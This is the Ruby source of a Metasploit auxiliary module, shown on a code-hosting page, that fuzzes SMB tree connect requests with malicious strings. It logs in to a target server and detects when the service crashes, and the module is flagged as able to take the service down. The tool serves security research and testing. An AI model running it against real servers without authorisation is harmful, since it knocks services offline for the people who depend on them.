Path: blob/master/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb
19851 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'English'6class MetasploitModule < Msf::Auxiliary7include Msf::Exploit::Remote::SMB::Client8include Msf::Auxiliary::Fuzzer910def initialize(info = {})11super(12update_info(13info,14'Name' => 'SMB Tree Connect Request Fuzzer',15'Description' => %q{16This module sends a series of SMB tree connect17requests using malicious strings.18},19'Author' => [ 'hdm' ],20'License' => MSF_LICENSE,21'Notes' => {22'Stability' => [CRASH_SERVICE_DOWN],23'SideEffects' => [],24'Reliability' => []25}26)27)28end2930def do_smb_connect(pkt, _opts = {})31@connected = false32connect33simple.login(34datastore['SMBName'],35datastore['SMBUser'],36datastore['SMBPass'],37datastore['SMBDomain']38)3940@connected = true41simple.connect("\\\\#{datastore['RHOST']}\\#{pkt}")42end4344def run45last_str = nil46last_inp = nil47last_err = nil4849cnt = 05051fuzz_strings do |str|52cnt += 15354if (cnt % 100 == 0)55print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")56end5758begin59do_smb_connect(str, 0.25)60rescue ::Interrupt61print_status("Exiting on interrupt: iteration #{cnt} using #{@last_fuzzer_input}")62raise $ERROR_INFO63rescue StandardError => e64last_err = e65ensure66disconnect67end6869if !@connected70if last_str71print_status("The service may have crashed: iteration:#{cnt - 1} method=#{last_inp} string=#{last_str.unpack('H*')[0]} error=#{last_err}")72else73print_status("Could not connect to the service: #{last_err}")74end75return76end7778last_str = str79last_inp = @last_fuzzer_input80end81end82end838485